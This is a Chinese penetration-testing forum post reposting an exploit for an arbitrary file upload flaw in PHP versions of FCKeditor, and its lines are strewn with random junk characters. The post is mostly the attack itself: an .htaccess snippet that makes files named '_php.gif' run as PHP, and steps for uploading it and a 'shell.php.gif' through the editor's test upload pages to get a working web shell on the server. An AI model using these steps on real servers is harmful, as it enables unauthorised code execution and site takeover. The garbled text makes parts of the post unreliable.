中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
4 M' h9 B3 K! R, w" V1 J作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07; s2 A. A& h9 U; \7 T2 z2 ~
减小字体 增大字体
/ G8 S0 _* u# B, q$ O- T[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
8 ^. u% K" F1 ]9 S: ~# ^4 ~[+] Date: 2011
' m9 o. ~1 J3 a/ S; t. `/ q) V1 q[+] Author : sinesafe.cn1 @' A! A8 T' @" j- t; z$ \
[+] Website : WwW.sinesafe.cn& g! O: h9 F' Y5 N( j
———————————————————, B3 Y5 F3 o/ l, Z
1.create a htaccess file:- A) K2 b" @8 k5 B* i
code:
' e4 B2 @1 c) w2 S3 Q2 r6 N6 R<FilesMatch “_php.gif”>
9 V' T3 \- \  f% S- ZSetHandler application/x-httpd-php
! ?) |' V( N" T. U9 S9 g. g</FilesMatch>
5 a5 M4 N/ R# s# g. u" R* |- o3 B6 L' \( e' n9 T
2.Now upload this htaccess with FCKeditor.0 P5 J' _5 B9 n* ~% p! D6 O
! |! q" N: H' x' N( l$ J
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
4 J; |: b% V& o1 W' }+ r; P; R0 l8 e  z2 D6 g5 }
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html  y& G( B3 K. ^1 s
1 ]5 k8 q. o0 g, s
———————————————————————————————-, U4 M% f- U2 j: K* q# V
3.Now upload shell.php.gif with FCKeditor.
' q' H, w6 M/ m4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically." u8 i0 q8 W: b8 u0 e  Y! G2 Y
5.http://www.sinesafe.cn/anything/shell_php.gif
6 H$ i. R) i$ U6.Now shell is available from server.
( Q/ ], P( i% _0 H9 v# l

9 W# O: g& t, ]; K' j
, ^/ `4 _6 {" a3 ?% C' d



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2